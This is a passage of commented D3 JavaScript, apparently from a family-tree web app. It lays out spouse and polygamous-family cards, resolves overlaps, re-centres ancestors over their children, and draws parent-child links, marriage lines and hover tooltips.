                // head.x ± (2k-1)×stride. This guarantees the H↔W_k line's
                // midpoint (H + (k - 0.5)×stride) falls in a visible gap
                // between intermediate cards, so every marriage's unity dot
                // renders on a visible portion of its line — no matter how
                // many co-wives are on the same side. Scales to arbitrary N.
                //
                // Trade-off: cards spread out horizontally faster (nearest
                // wife stride, then +2×stride for each additional wife on the
                // same side). Horizontal scroll bands (T6) handle the width.
                spouses.forEach((spouse, i) => {
                    let targetX;
                    if (i < leftCount) {
                        const k = leftCount - i;             // 1 = nearest, N = furthest
                        targetX = headX - (2 * k - 1) * stride;
                    } else {
                        const k = i - leftCount + 1;
                        targetX = headX + (2 * k - 1) * stride;
                    }
                    const delta = targetX - originalX.get(spouse.data.id);
                    if (delta === 0) return;
                    // Move spouse + descendants EXCEPT the head node itself.
                    spouse.each(n => {
                        if (n.data.id !== headId) n.x += delta;
                    });
                    repositionedForSpouse.add(spouse.data.id);
                });
                repositionedForSpouse.add(headId);
            });

            // Monogamous adjacency pass — for spouse pairs neither of whom
            // was touched by the polygamous pass above, if they landed on
            // the same row but too far apart, snug them together at
            // stride distance. Preserves the leftmost partner's position;
            // moves the right partner's subtree (minus the left partner).
            const monogSpousePairsSeen = new Set();
            relationships.forEach(rel => {
                if (rel.type !== 'SPOUSE_OF') return;
                const aId = rel.from && rel.from.id;
                const bId = rel.to && rel.to.id;
                if (aId == null || bId == null) return;
                const key = [aId, bId].sort((x, y) => x - y).join('-');
                if (monogSpousePairsSeen.has(key)) return;
                monogSpousePairsSeen.add(key);
                if (repositionedForSpouse.has(aId) || repositionedForSpouse.has(bId)) return;

                const a = nodeById.get(aId);
                const b = nodeById.get(bId);
                if (!a || !b) return;
                if (Math.abs(a.y - b.y) > 4) return;
                if (Math.abs(a.x - b.x) < stride * 1.3) return;   // already close enough

                const leftPartner = a.x <= b.x ? a : b;
                const rightPartner = a.x <= b.x ? b : a;
                const targetRightX = leftPartner.x + stride;
                const delta = targetRightX - rightPartner.x;
                if (delta === 0) return;
                const leftPartnerId = leftPartner.data.id;
                rightPartner.each(n => {
                    if (n.data.id !== leftPartnerId) n.x += delta;
                });
                repositionedForSpouse.add(aId);
                repositionedForSpouse.add(bId);
            });

            // Spouse-adjacency enforcement — after T4 polygamous + monogamous
            // adjacency passes, any spouse pair that STILL has siblings /
            // other cards sitting between them at the same y is a problem:
            // the union-midpoint child edges pass through those intruders
            // and the layout reads confused ("who's the child of whom?").
            //
            // Fix: for every spouse pair on the same row, push any card
            // between them (and its entire d3.hierarchy subtree) past the
            // right partner so the couple lands adjacent. Rightmost intruder
            // moves first to preserve left-to-right ordering of the pushed
            // group.
            const adjSpousePairsSeen = new Set();
            relationships.forEach(rel => {
                if (rel.type !== 'SPOUSE_OF') return;
                const aId = rel.from && rel.from.id;
                const bId = rel.to && rel.to.id;
                if (aId == null || bId == null) return;
                const key = [aId, bId].sort((x, y) => x - y).join('-');
                if (adjSpousePairsSeen.has(key)) return;
                adjSpousePairsSeen.add(key);

                const a = nodeById.get(aId);
                const b = nodeById.get(bId);
                if (!a || !b) return;
                if (Math.abs(a.y - b.y) > 4) return;

                // Skip enforcement only for pairs involving a polygamous
                // head. T4 places co-wives at head ± (2k-1)×stride by design,
                // so intermediates between head and far-out wives are
                // intentional — enforcement would wreck the layout. But
                // monogamous couples (e.g., Olu Jr ↔ Lola) can still have
                // unrelated siblings/cousins land between them from d3.tree's
                // initial layout, and enforcement is what pushes those out.
                // The earlier `repositionedForSpouse` guard was too broad —
                // it caught monogamous pairs post-adjacency and let intruders
                // stay put.
                if (polyHeadIdsForEnforce.has(aId) || polyHeadIdsForEnforce.has(bId)) return;

                const left = a.x <= b.x ? a : b;
                const right = a.x <= b.x ? b : a;

                // Do NOT short-circuit on gap size. Even when left and right
                // are at exactly `stride` distance, a card can sit between
                // them (d3.tree default sibling spacing is 200px, less than
                // stride 220). The visual result is an intruder inside the
                // union's empty middle — which then breaks child-connector
                // routing. Always look for intruders; only skip enforcement
                // when there are none.
                const between = allNodes.filter(n => {
                    if (n.data.id === left.data.id || n.data.id === right.data.id) return false;
                    if (Math.abs(n.y - left.y) > 4) return false;
                    return n.x > left.x + 1 && n.x < right.x - 1;
                });

                if (between.length === 0) return;

                between.sort((x, y) => y.x - x.x);  // rightmost first
                let pushSlot = right.x + stride;
                between.forEach(intruder => {
                    const delta = pushSlot - intruder.x;
                    if (delta > 0) {
                        intruder.each(n => { n.x += delta; });
                    }
                    pushSlot += stride;
                });

                const newRightTarget = left.x + stride;
                const rightDelta = newRightTarget - right.x;
                if (rightDelta !== 0) {
                    right.each(n => {
                        if (n.data.id !== left.data.id) n.x += rightDelta;
                    });
                }
            });

            // Collision resolution — after all spouse repositioning, walk
            // each generation left-to-right and push cards apart if any two
            // adjacent ones are closer than the min gap (150 = card width).
            // Cascades: pushing card N right also pushes N+1, N+2… by the
            // same delta so downstream siblings don't collide.
            const minGap = 180;
            const nodesByY = new Map();
            allNodes.forEach(n => {
                const yKey = Math.round(n.y);
                if (!nodesByY.has(yKey)) nodesByY.set(yKey, []);
                nodesByY.get(yKey).push(n);
            });
            nodesByY.forEach(row => {
                if (row.length < 2) return;
                row.sort((a, b) => a.x - b.x);
                for (let i = 0; i < row.length - 1; i++) {
                    const gap = row[i + 1].x - row[i].x;
                    if (gap < minGap) {
                        const push = minGap - gap;
                        for (let j = i + 1; j < row.length; j++) row[j].x += push;
                    }
                }
            });

            // === 2026-07-23 Ancestor re-center pass ===
            // The T4 stride, monog adjacency, enforcement, and collision-
            // resolution passes above shift DESCENDANT subtrees to keep
            // spouses adjacent and prevent overlaps. They do not update
            // ancestor positions (d3.hierarchy.each() walks descendants
            // only). Result: when a rightPartner's subtree includes an
            // ANCESTOR-in-hier (grandparent case: Michael is in
            // Olusola's hier as her parent), the ancestor stays parked
            // at the initial subtree-offset position while the moved
            // partner snugs next to their spouse.
            //
            // Fix: single-pass, bottom-up re-center. For each parent
            // node with children, move the parent (or the parent's
            // spouse pair) to the children's x midpoint. Restores
            // d3.tree's "parent-above-children" invariant.
            //
            // Polygamous heads get RIGID CLUSTER TRANSLATION instead of
            // being skipped. First iteration skipped them, which fixed
            // monogamous 3-gen chains but left polygamous 3-gen chains
            // stranded (head + wives cluster stayed at pre-recenter
            // offset — original bug, poly-only). Now: when the walk hits
            // any cluster member (head OR wife), compute delta = head's
            // bio-children midpoint − head.x, then shift head + all
            // wives at head's row by that same delta. T4's (2k-1)×stride
            // spacing is a set of relative distances that survives
            // rigid translation unchanged; marriage-line midpoint dots
            // are computed at render time from spouse positions, so
            // they follow automatically. Wives' subtrees are NOT
            // shifted here — their descendants have their own re-center
            // fired earlier in the post-order walk and are already at
            // correct positions.
            //
            // Guards:
            //   1. Collision-clamp uses CLUSTER bounds (leftmost wife's
            //      edge to rightmost wife's edge), not the head's card
            //      alone — a wide poly cluster shouldn't be allowed to
            //      collide with a same-row non-cluster neighbor.
            //   2. Non-poly nodes get the existing pair/single logic
            //      with an added check: don't pair with a poly cluster
            //      member (their placement belongs to the cluster).
            //   3. Log clamps + cluster shifts so future data that hits
            //      this frequently is diagnosable.
            //
            // The enforcement pass's polyHead skip guard is UNCHANGED —
            // that pass exists to push non-cluster intruders out from
            // between monogamous pairs, and would incorrectly treat
            // T4-placed co-wives as intruders. Cluster translation is
            // this pass's job, not enforcement's.
            //
            // Bounds computation (Full + Focused mode) runs AFTER this
            // pass — captures re-centered ancestors + translated clusters
            // for fit-transform + pinch translate extents.
            const spouseIdsOf = new Map();
            relationships.forEach(rel => {
                if (rel.type !== 'SPOUSE_OF') return;
                const a = rel.from && rel.from.id;
                const b = rel.to && rel.to.id;
                if (a == null || b == null) return;
                if (!spouseIdsOf.has(a)) spouseIdsOf.set(a, new Set());
                if (!spouseIdsOf.has(b)) spouseIdsOf.set(b, new Set());
                spouseIdsOf.get(a).add(b);
                spouseIdsOf.get(b).add(a);
            });
            // polyHeadOf: any cluster member id → cluster head id.
            // Membership lookup for the re-center walk.
            const polyHeadOf = new Map();
            polyHeadIdsForEnforce.forEach(headId => {
                polyHeadOf.set(headId, headId);
                (spouseIdsOf.get(headId) || new Set()).forEach(wid => {
                    polyHeadOf.set(wid, headId);
                });
            });
            // bioChildrenOf: person id → Set of raw CHILD_OF child ids.
            // The poly head's primary hier children may be empty (all
            // kids attributed to wives via primary-parent selection),
            // so we can't use n.children to find them. Raw graph edges
            // are the honest source.
            const bioChildrenOf = new Map();
            relationships.forEach(rel => {
                if (rel.type !== 'CHILD_OF') return;
                const cid = rel.from && rel.from.id;
                const pid = rel.to && rel.to.id;
                if (cid == null || pid == null) return;
                if (!bioChildrenOf.has(pid)) bioChildrenOf.set(pid, new Set());
                bioChildrenOf.get(pid).add(cid);
            });
            const _reCenterClamps = [];
            const _reCenterClusterShifts = [];
            const clustersProcessed = new Set();
            const moveWithClamp = (node, targetX, skipIds) => {
                const delta = targetX - node.x;
                if (delta === 0) return;
                const dir = delta > 0 ? 1 : -1;
                let allowed = delta;
                allNodes.forEach(m => {
                    if (skipIds.has(m.data.id)) return;
                    if (Math.abs(m.y - node.y) > 4) return;
                    // Only neighbors in the delta direction can block.
                    const towardM = m.x - node.x;
                    if (towardM === 0) return;
                    if ((towardM > 0) !== (dir > 0)) return;
                    // Available gap = current x-distance minus minGap.
                    const currentDist = Math.abs(towardM);
                    const availableGap = currentDist - minGap;
                    const availableSigned = dir * Math.max(0, availableGap);
                    // If we'd overshoot this neighbor, clamp.
                    if (Math.abs(availableSigned) < Math.abs(allowed)) {
                        allowed = availableSigned;
                    }
                });
                if (Math.abs(allowed) < Math.abs(delta)) {
                    _reCenterClamps.push({
                        personId: node.data.id,
                        wanted: Math.round(delta),
                        applied: Math.round(allowed),
                    });
                }
                node.x += allowed;
            };
            hierRoots.forEach(root => {
                root.eachAfter(n => {
                    const clusterHeadId = polyHeadOf.get(n.data.id);
                    if (clusterHeadId != null) {
                        // n is in a poly cluster. Process the cluster once
                        // (whichever member we hit first in the walk).
                        if (clustersProcessed.has(clusterHeadId)) return;
                        clustersProcessed.add(clusterHeadId);
                        const headNode = nodeById.get(clusterHeadId);
                        if (!headNode) return;
                        const bioKidIds = bioChildrenOf.get(clusterHeadId);
                        if (!bioKidIds || bioKidIds.size === 0) return;
                        const kidNodes = [...bioKidIds]
                            .map(kid => nodeById.get(kid))
                            .filter(Boolean);
                        if (kidNodes.length === 0) return;
                        let kMinX = Infinity, kMaxX = -Infinity;
                        kidNodes.forEach(k => {
                            if (k.x < kMinX) kMinX = k.x;
                            if (k.x > kMaxX) kMaxX = k.x;
                        });
                        const childMid = (kMinX + kMaxX) / 2;
                        const delta = childMid - headNode.x;
                        if (Math.abs(delta) < 0.5) return;
                        // Cluster row nodes = head + all his spouses at
                        // head's y. Wives' subtrees are NOT part of the
                        // rigid shift — they've already been re-centered
                        // over their own descendants earlier in the
                        // post-order walk.
                        const wives = [...(spouseIdsOf.get(clusterHeadId) || new Set())]
                            .map(id => nodeById.get(id))
                            .filter(w => w && Math.abs(w.y - headNode.y) <= 4);
                        const clusterNodes = [headNode, ...wives];
                        const clusterNodeIds = new Set(clusterNodes.map(m => m.data.id));
                        // Cluster bounds: leftmost cluster node's x to
                        // rightmost. Collision-clamp against same-row
                        // non-cluster neighbors uses the edge in the
                        // delta direction (whichever wife is in front of
                        // the shift).
                        let cMinX = Infinity, cMaxX = -Infinity;
                        clusterNodes.forEach(m => {
                            if (m.x < cMinX) cMinX = m.x;
                            if (m.x > cMaxX) cMaxX = m.x;
                        });
                        let allowedDelta = delta;
                        const dir = delta > 0 ? 1 : -1;
                        const clusterEdge = dir > 0 ? cMaxX : cMinX;
                        allNodes.forEach(m => {
                            if (clusterNodeIds.has(m.data.id)) return;
                            if (Math.abs(m.y - headNode.y) > 4) return;
                            const towardM = m.x - clusterEdge;
                            if (towardM === 0) return;
                            if ((towardM > 0) !== (dir > 0)) return;
                            const currentDist = Math.abs(towardM);
                            const availableGap = currentDist - minGap;
                            const availableSigned = dir * Math.max(0, availableGap);
                            if (Math.abs(availableSigned) < Math.abs(allowedDelta)) {
                                allowedDelta = availableSigned;
                            }
                        });
                        if (Math.abs(allowedDelta) < Math.abs(delta)) {
                            _reCenterClamps.push({
                                personId: clusterHeadId,
                                cluster: true,
                                wanted: Math.round(delta),
                                applied: Math.round(allowedDelta),
                            });
                        }
                        clusterNodes.forEach(m => { m.x += allowedDelta; });
                        _reCenterClusterShifts.push({
                            headId: clusterHeadId,
                            wives: wives.length,
                            delta: Math.round(allowedDelta),
                        });
                        return;
                    }
                    // Non-cluster path: existing spouse-pair or single-
                    // node centering. Skip if no children (leaf) — nothing
                    // to re-center over.
                    if (!n.children || n.children.length === 0) return;
                    let cMinX = Infinity, cMaxX = -Infinity;
                    n.children.forEach(c => {
                        if (c.x < cMinX) cMinX = c.x;
                        if (c.x > cMaxX) cMaxX = c.x;
                    });
                    const childMid = (cMinX + cMaxX) / 2;
                    // Spouse on same row? If yes, center as a pair. Skip
                    // poly cluster members as spouse candidates (their
                    // placement is owned by the cluster path above, not
                    // by pair-centering).
                    let spouseNode = null;
                    const nSpouses = spouseIdsOf.get(n.data.id);
                    if (nSpouses) {
                        for (const other of allNodes) {
                            if (other === n) continue;
                            if (Math.abs(other.y - n.y) > 4) continue;
                            if (polyHeadOf.has(other.data.id)) continue;
                            if (nSpouses.has(other.data.id)) {
                                spouseNode = other;
                                break;
                            }
                        }
                    }
                    if (spouseNode) {
                        const leftIsN = n.x <= spouseNode.x;
                        const targetN = leftIsN ? childMid - stride / 2 : childMid + stride / 2;
                        const targetS = leftIsN ? childMid + stride / 2 : childMid - stride / 2;
                        const skipIds = new Set([n.data.id, spouseNode.data.id]);
                        moveWithClamp(n, targetN, skipIds);
                        moveWithClamp(spouseNode, targetS, skipIds);
                    } else {
                        moveWithClamp(n, childMid, new Set([n.data.id]));
                    }
                });
            });
            if (_reCenterClamps.length > 0) {
                console.log('[FTV re-center] Clamped', _reCenterClamps.length, 'ancestor moves:', _reCenterClamps);
            }
            if (_reCenterClusterShifts.length > 0) {
                console.log('[FTV re-center] Shifted', _reCenterClusterShifts.length, 'poly cluster(s):', _reCenterClusterShifts);
            }

            // Phase 2.5 T2 — parent-child edges follow the mockup routing:
            // children of a married pair start from the UNION MIDPOINT (unity
            // dot position); children of a single in-tree parent start from
            // that parent's bottom-center. Child endpoint is always the
            // child's top-center. Curve pattern per brief:
            //   M x1 y1 C x1 midY x2 midY x2 y2
            // with straight vertical when x1 === x2.
            const positionMap = new Map();
            allNodes.forEach(d => { positionMap.set(d.data.id, { x: d.x, y: d.y }); });

            // child id → array of in-tree parent ids (deduped).
            const parentsOfChild = new Map();
            relationships.forEach(rel => {
                if (rel.type !== 'CHILD_OF') return;
                const cid = rel.from && rel.from.id;
                const pid = rel.to && rel.to.id;
                if (cid == null || pid == null) return;
                if (!positionMap.has(cid) || !positionMap.has(pid)) return;
                if (!parentsOfChild.has(cid)) parentsOfChild.set(cid, []);
                const arr = parentsOfChild.get(cid);
                if (!arr.includes(pid)) arr.push(pid);
            });

            // Spouse-pair index (unordered id-sorted key) — used to decide
            // whether two parents of a shared child are actually a married
            // couple (worth routing via union midpoint) or just co-parents
            // who happen to share a child but aren't married (rare, but
            // handle gracefully).
            const spousePairKeys = new Set();
            relationships.forEach(rel => {
                if (rel.type !== 'SPOUSE_OF') return;
                const aId = rel.from && rel.from.id;
                const bId = rel.to && rel.to.id;
                if (aId == null || bId == null) return;
                spousePairKeys.add([aId, bId].sort((x, y) => x - y).join('-'));
            });

            const parentChildEdges = [];
            parentsOfChild.forEach((parents, childId) => {
                const cpos = positionMap.get(childId);
                if (!cpos) return;

                // Two parents connected by SPOUSE_OF at the same y → route
                // from their union midpoint (unity dot position).
                if (parents.length === 2) {
                    const key = [parents[0], parents[1]].sort((x, y) => x - y).join('-');
                    if (spousePairKeys.has(key)) {
                        const p1 = positionMap.get(parents[0]);
                        const p2 = positionMap.get(parents[1]);
                        if (p1 && p2 && Math.abs(p1.y - p2.y) <= 4) {
                            parentChildEdges.push({
                                source: { x: (p1.x + p2.x) / 2, y: (p1.y + p2.y) / 2 },
                                target: cpos,
                                fromUnionMidpoint: true,
                            });
                            return;
                        }
                    }
                }

                // Fallback — draw one edge per in-tree parent from parent
                // bottom-center to child top-center.
                parents.forEach(pid => {
                    const ppos = positionMap.get(pid);
                    if (!ppos) return;
                    parentChildEdges.push({
                        source: ppos,
                        target: cpos,
                        fromUnionMidpoint: false,
                    });
                });
            });

            const linkElements = g.selectAll(".link")
                .data(parentChildEdges)
                .enter().append("g")
                .attr("class", "link-group");

            // T2 endpoints:
            //   - Union-midpoint origin: already at (midX, parents' center y)
            //     — do NOT offset y. The unity dot sits between the cards
            //     horizontally, so its y is the parent-row's center.
            //   - Single-parent origin: offset by +cardHalfH so the line
            //     leaves the parent's bottom edge.
            //   - Child endpoint: always -cardHalfH so it lands at the top
            //     of the child card.
            const cardHalfH = 55;
            linkElements.append("path")
                .attr("class", "link")
                .attr("fill", "none")
                .attr("stroke", "#C8B89E")
                .attr("stroke-width", 1.5)
                .attr("stroke-linecap", "round")
                .attr("d", d => {
                    const s = d.source, t = d.target;
                    const sy = d.fromUnionMidpoint ? s.y : s.y + cardHalfH;
                    const ty = t.y - cardHalfH;
                    if (s.x === t.x) return `M${s.x},${sy} L${t.x},${ty}`;
                    const midY = (sy + ty) / 2;
                    return `M${s.x},${sy} C${s.x},${midY} ${t.x},${midY} ${t.x},${ty}`;
                })
                .attr("opacity", 1)
                .on("mouseover", function() {
                    d3.select(this).attr("stroke-width", 2.2);
                })
                .on("mouseout", function() {
                    d3.select(this).attr("stroke-width", 1.5);
                });

            // === Phase 2.5 T3: marriage-edge overlay ===
            // Runs after the parent-child link pass so marriage lines sit on
            // top visually (unity dot is the last thing added at each pair).
            //
            // Spec (from brief):
            //   - Straight horizontal line, stroke #C8873F (--ebw-marriage),
            //     stroke-width 2, round linecap.
            //   - Filled circle r=3 at midpoint, same fill.
            //   - Only between spouses currently in the visible node set AND
            //     landing on the same generation row (same y ± small tolerance).
            //   - Line goes edge-to-edge, not center-to-center, so it doesn't
            //     visually pass through the two spouse cards.
            //   - SPOUSE_OF is symmetric — dedupe with an unordered pair key.
            //
            // Cross-generation spouse pairs (e.g. viewer's spouse who has
            // parents 2 gens above the viewer) are skipped in T3. Repositioning
            // spouses to align generations belongs to T4 (polygamous handling)
            // and later scope, not T3.
            //
            // Cards are 150 wide. Left/right edge = center ± 75.
            const cardHalfW = 75;
            const marriageEdges = [];
            const drawnMarriageKeys = new Set();
            relationships.forEach(rel => {
                if (rel.type !== 'SPOUSE_OF') return;
                const aId = rel.from && rel.from.id;
                const bId = rel.to && rel.to.id;
                if (aId == null || bId == null) return;
                const key = [aId, bId].sort((x, y) => x - y).join('-');
                if (drawnMarriageKeys.has(key)) return;
                const a = positionMap.get(aId);
                const b = positionMap.get(bId);
                if (!a || !b) return;
                // Same-generation gate. Small tolerance covers float roundoff
                // from the layout pass. Cross-gen pairs fall through to T4.
                if (Math.abs(a.y - b.y) > 4) return;
                drawnMarriageKeys.add(key);
                const left = a.x <= b.x ? a : b;
                const right = a.x <= b.x ? b : a;
                const leftId = a.x <= b.x ? aId : bId;
                const rightId = a.x <= b.x ? bId : aId;
                marriageEdges.push({ left, right, leftId, rightId, y: (a.y + b.y) / 2 });
            });

            // Straight horizontal marriage line at baseline with unity dot at
            // midpoint. For polygamous heads with 3+ wives on a side, T4's
            // dynamic-stride placement ensures each H↔W_k midpoint lands in
            // a visible gap between intermediate cards — the line itself
            // still passes behind those cards, but the dot renders on a
            // visible portion of the line. Scales to arbitrary N wives.
            const marriageGroup = g.append("g").attr("class", "marriage-layer");
            marriageEdges.forEach(m => {
                const lineX1 = m.left.x + cardHalfW;
                const lineX2 = m.right.x - cardHalfW;
                if (lineX2 <= lineX1) return;
                const midX = (lineX1 + lineX2) / 2;

                marriageGroup.append("line")
                    .attr("class", "marriage-line")
                    .attr("x1", lineX1)
                    .attr("y1", m.y)
                    .attr("x2", lineX2)
                    .attr("y2", m.y)
                    .attr("stroke", "#C8873F")
                    .attr("stroke-width", 2)
                    .attr("stroke-linecap", "round");

                marriageGroup.append("circle")
                    .attr("class", "marriage-dot")
                    .attr("cx", midX)
                    .attr("cy", m.y)
                    .attr("r", 3)
                    .attr("fill", "#C8873F");
            });

            // Second-parent redraw not needed under T1 — the direct CHILD_OF
            // edge iteration above already renders every parent-child edge,
            // including both parents of a shared child.

            // T7 — draw the "Unconnected" band divider + label. Placed under
            // `g` so it pans/zooms with the tree. Kept subtle so it reads as
            // a visual separator, not a UI element. Hidden when there's no
            // floater band OR when we're in Focused mode.
            if (floaterBandBounds) {
                const bandGroup = g.append("g").attr("class", "floater-band");

                bandGroup.append("line")
                    .attr("x1", floaterBandBounds.minX)
                    .attr("x2", floaterBandBounds.maxX)
                    .attr("y1", floaterBandBounds.dividerY)
                    .attr("y2", floaterBandBounds.dividerY)
                    .attr("stroke", "#E8DCC7")   // --ebw-border-warm
                    .attr("stroke-width", 1)
                    .attr("stroke-dasharray", "4,3");

                bandGroup.append("text")
                    .attr("x", floaterBandBounds.minX)
                    .attr("y", floaterBandBounds.y - 95)
                    .attr("font-family", "'Lora', Georgia, serif")
                    .attr("font-style", "italic")
                    .attr("font-size", "13px")
                    .attr("fill", "#9C8770")     // --ebw-text-hint
                    .text("Unconnected");
            }

            // Draw nodes with enhanced styling
            const node = g.selectAll(".node")
                .data(allNodes)
                .enter().append("g")
                .attr("class", "node")
                .attr("transform", d => `translate(${d.x},${d.y})`)
                .style("cursor", "pointer")
                .on("click", (event, d) => {
                    const person = persons.find(p => p.id === d.data.id);
                    if (person) {
                        navigateToView('person-detail-view', { person: person });
                    }
                })
                .on("mouseover", function(event, d) {
                    d3.select(this).select(".node-card")
                        .transition()
                        .duration(200)
                        .attr("stroke-width", 3)
                        .attr("filter", "url(#card-glow)");
                    d3.select(this)
                        .transition()
                        .duration(200)
                        .attr("transform", d => `translate(${d.x},${d.y - 4})`);

                    // Show generation tooltip. B33: skip the depth-based
                    // label for floaters — their position at the top of the
                    // tree is a layout artifact, not a real generation.
                    // D3: persons connected only via the new direct-set types
                    // (COUSIN_OF, AUNT_UNCLE_OF, etc.) often sit at depth 1
                    // with no underlying CHILD_OF chain, so the depth-derived
                    // label reads as "Grandparents" or worse. When that
                    // happens, prefer the role label (which the role-mapping
                    // code already computed correctly from the rel type).
                    const personId = d.data && d.data.id;
                    const isFloater = personId != null && !connectedSet.has(personId);
                    // 2026-07-23 taxonomy split: grandparents + grandchildren
                    // are LINEAL family (direct ancestry / descent), not
                    // "extended." Aunt/uncle/niece/nephew/cousin are the
                    // real extended tiers (sibling-collateral, not direct
                    // line). Prior code lumped all five into one bucket
                    // labeled "Extended family" — wrong for the lineal
                    // tiers, mislabeled hover.
                    const isLinealExtended = personId != null && (
                        grandparentSet.has(personId) ||
                        grandchildSet.has(personId)
                    );
                    const isCollateralExtended = personId != null && (
                        cousinSet.has(personId) ||
                        auntUncleSet.has(personId) ||
                        nieceNephewSet.has(personId)
                    );
                    const personRole = personId != null ? roleMap.get(personId) : null;
                    if (isFloater) {
                        cardTooltip
                            .html(`<div style="text-align: center;"><div style="font-size: 11px; opacity: 0.8; margin-bottom: 3px;">Not yet connected</div><div>Add a relationship to place this person in your family</div></div>`)
                            .style("left", (event.pageX + 15) + "px")
                            .style("top", (event.pageY - 10) + "px")
                            .style("opacity", 1);
                    } else if (isLinealExtended && personRole) {
                        // Grandparents / grandchildren: lineal, use the
                        // generation label the layout already computed.
                        // "Gen N / Grandfather" reads honestly against
                        // depth-based placement.
                        const genDepth = genDepthOf.has(d.data.id)
                            ? genDepthOf.get(d.data.id)
                            : d.depth;
                        const genNumber = genDepth + 1;
                        cardTooltip
                            .html(`<div style="text-align: center;"><div style="font-size: 11px; opacity: 0.8; margin-bottom: 3px;">Gen ${genNumber}</div><div>${personRole}</div></div>`)
                            .style("left", (event.pageX + 15) + "px")
                            .style("top", (event.pageY - 10) + "px")
                            .style("opacity", 1);
                    } else if (isCollateralExtended && personRole) {
                        cardTooltip
                            .html(`<div style="text-align: center;"><div style="font-size: 11px; opacity: 0.8; margin-bottom: 3px;">Extended family</div><div>${personRole}</div></div>`)
                            .style("left", (event.pageX + 15) + "px")
                            .style("top", (event.pageY - 10) + "px")
                            .style("opacity", 1);
                    } else {
                        // T15: read genDepth from the same BFS result the
                        // layout used. The backend Phase 0 field is stale
                        // (backend BFS from tree roots, not viewer-relative).
                        const genDepth = genDepthOf.has(d.data.id)
                            ? genDepthOf.get(d.data.id)
                            : d.depth;
                        const genLabel = getGenerationLabel(genDepth, referenceDepth);
                        const genNumber = genDepth + 1;
                        cardTooltip
                            .html(`<div style="text-align: center;"><div style="font-size: 11px; opacity: 0.8; margin-bottom: 3px;">Gen ${genNumber}</div><div>${genLabel}</div></div>`)
                            .style("left", (event.pageX + 15) + "px")
                            .style("top", (event.pageY - 10) + "px")
                            .style("opacity", 1);
                    }
                })
                .on("mousemove", function(event, d) {
                    cardTooltip
                        .style("left", (event.pageX + 15) + "px")
                        .style("top", (event.pageY - 10) + "px");
                })
                .on("mouseout", function(event, d) {
                    d3.select(this).select(".node-card")
                        .transition()
                        .duration(200)
                        .attr("stroke-width", 2)
                        .attr("filter", "url(#drop-shadow)");
                    d3.select(this)
                        .transition()
                        .duration(200)
                        .attr("transform", d => `translate(${d.x},${d.y})`);

                    // Hide tooltip
                    cardTooltip.style("opacity", 0);
                });

            // Add enhanced drop shadow filter
            const defs = svg.append("defs");

            // Soft shadow for cards
            const filter = defs.append("filter")
                .attr("id", "drop-shadow")
                .attr("height", "180%")
                .attr("width", "180%")
                .attr("x", "-20%")
                .attr("y", "-20%");
            filter.append("feGaussianBlur")
                .attr("in", "SourceAlpha")
                .attr("stdDeviation", 6);
            filter.append("feOffset")
                .attr("dx", 0)
                .attr("dy", 4)
                .attr("result", "offsetblur");
            filter.append("feComponentTransfer")
                .append("feFuncA")
                .attr("type", "linear")
                .attr("slope", 0.2);
            const feMerge = filter.append("feMerge");
            feMerge.append("feMergeNode");
            feMerge.append("feMergeNode")
                .attr("in", "SourceGraphic");

            // Hover glow filter
            const glowFilter = defs.append("filter")
                .attr("id", "card-glow")
                .attr("height", "200%")
                .attr("width", "200%")
                .attr("x", "-25%")
                .attr("y", "-25%");
            glowFilter.append("feGaussianBlur")
                .attr("in", "SourceAlpha")
                .attr("stdDeviation", 8);
            glowFilter.append("feOffset")
                .attr("dx", 0)
                .attr("dy", 6)
                .attr("result", "offsetblur");
            glowFilter.append("feComponentTransfer")
                .append("feFuncA")
                .attr("type", "linear")
                .attr("slope", 0.25);
            const glowMerge = glowFilter.append("feMerge");
            glowMerge.append("feMergeNode");
            glowMerge.append("feMergeNode")
                .attr("in", "SourceGraphic");

            // Add gradient definitions for cards — warmer earth tones
            const gradientMale = defs.append("linearGradient")
                .attr("id", "gradient-male")
                .attr("x1", "0%").attr("y1", "0%")
                .attr("x2", "0%").attr("y2", "100%");
            gradientMale.append("stop")
                .attr("offset", "0%")
                .attr("stop-color", "#f0f5ff");
            gradientMale.append("stop")
                .attr("offset", "100%")
                .attr("stop-color", "#ffffff");

            const gradientFemale = defs.append("linearGradient")
                .attr("id", "gradient-female")
                .attr("x1", "0%").attr("y1", "0%")
                .attr("x2", "0%").attr("y2", "100%");
            gradientFemale.append("stop")
                .attr("offset", "0%")
                .attr("stop-color", "#fef2f8");
            gradientFemale.append("stop")
                .attr("offset", "100%")
                .attr("stop-color", "#ffffff");

            const gradientOther = defs.append("linearGradient")
                .attr("id", "gradient-other")
                .attr("x1", "0%").attr("y1", "0%")
                .attr("x2", "0%").attr("y2", "100%");
            gradientOther.append("stop")
                .attr("offset", "0%")
                .attr("stop-color", "#faf5ee");
            gradientOther.append("stop")
                .attr("offset", "100%")
                .attr("stop-color", "#ffffff");

            // Build role map: determine each person's primary role from relationships
            const roleMap = new Map(); // person ID -> role label
            const spouseSet = new Set();
            const parentSet = new Set();
            const childSet = new Set();
            const siblingSet = new Set();
            const auntUncleSet = new Set();   // person is aunt/uncle OF someone
            const nieceNephewSet = new Set(); // person is niece/nephew OF someone
            const cousinSet = new Set();
            const grandparentSet = new Set();
            const grandchildSet = new Set();
            // B33: track who appears in any relationship at all. Persons
            // MEMBER_OF the tree but with no SPOUSE_OF/CHILD_OF/SIBLING_OF
            // (etc.) become "floaters." Under Phase 2.5 T1 they render as
            // their own single-node components (no in-tree parent → their
            // own subtree). T7 will move them to a dedicated "Unconnected"
            // band above the main tree. For T1 they sit at their own
            // subtree slot and use this set for the tentative card style +
            // the misleading-generation-label suppression.
            const connectedSet = new Set();

            // B42 + Phase 2 perspective toggle: role labels are computed
            // relative to an anchor Person. The default anchor is the
            // VIEWER (their REPRESENTS Person). Phase 2 lets the user
            // toggle to the TREE CREATOR's perspective for cases where
            // they want to see how the creator sees the tree.
            //
            // viewerPersonId resolves the viewer via represented_by_user_id;
            // creatorPersonId resolves whichever Person the tree creator's
            // User REPRESENTS via the same field. If the toggle state is
            // 'creator' and we can resolve a creator Person, use that as
            // anchor; otherwise fall back to viewer.
            const viewerPersonRecord = persons.find(p =>
                p.represented_by_user_id != null
                && String(p.represented_by_user_id) === String(appState.currentUserNeo4jId)
            );
            const viewerPersonId = viewerPersonRecord ? viewerPersonRecord.id : null;

            // The tree creator's Person id. Surfaces via tree metadata that
            // appState.currentTree.creator_user_id holds when available;
            // fall back to scanning for a Person whose represented_by_user_id
            // matches the tree's creator user id (if we have it).
            const creatorUserId = appState.currentTree && appState.currentTree.creator_user_id;
            let creatorPersonId = null;
            if (creatorUserId != null) {
                const creatorRecord = persons.find(p =>
